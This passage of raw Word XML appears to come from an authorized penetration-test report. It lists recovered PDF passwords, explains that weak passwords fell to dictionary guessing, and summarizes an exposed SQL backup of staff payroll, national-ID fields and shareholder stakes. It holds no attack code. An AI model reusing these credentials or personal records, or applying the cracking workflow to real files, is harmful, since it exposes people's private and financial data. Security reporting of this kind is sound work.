            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V=2 / R=3 / 128-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Decrypted; qpdf check clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V=2 / R=3 / 128-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>!@#$%^&amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Decrypted; qpdf check clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Credential handling note: the passwords are included only in the confidential edition because the authorized exercise required recovery. They must be redacted from any public portfolio copy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the encryption result matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Encryption did not compensate for the application-level access-control failure because the attacker could first obtain the files legitimately through the compromised application session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The recovered passwords were weak enough to be found through dictionary-based guessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The evidence demonstrates the difference between file-at-rest protection and application authorization: encryption can reduce exposure after unauthorized file acquisition, but it cannot replace server-side authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="1422400"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="05_PDF_Hash_Extraction.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1422400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: extracted PDF hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2595808"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="21_PDF_Crack_Execution.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2595808"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: authorized password-recovery execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2044903"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="15_Patient_Report_1_Decryption.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2044903"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report 1 decryption validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2222717"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="17_Patient_Report_2_Decryption.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2222717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report 2 decryption validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="1063739"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="19_Patient_Report_3_Decryption.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1063739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report 3 decryption validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>24. Milestone 3 — Internal Data Exposure &amp; Quantification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The exposed SQL backup provides a second, independent compromise path. It contains structured HR and shareholder tables rather than a single accidental record. The dataset is sufficient to calculate exact payroll totals and to characterize the ownership table.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Dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fields of note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>staff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Name, role, department, email, phone, national ID, monthly salary, join date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shareholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Name, ownership %, shares held, share class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Payroll metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Staff records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Monthly payroll total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 2,027,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Average monthly salary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 67,567</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Minimum monthly salary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 19,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Maximum monthly salary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ZAR 160,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Shareholder structure</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shareholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ownership %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Rajesh Naidoo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>18.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>180,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cedar Health Holdings (Pty) Ltd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>15.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>150,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Johan van der Merwe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>12.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>120,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reddy Family Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>110,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
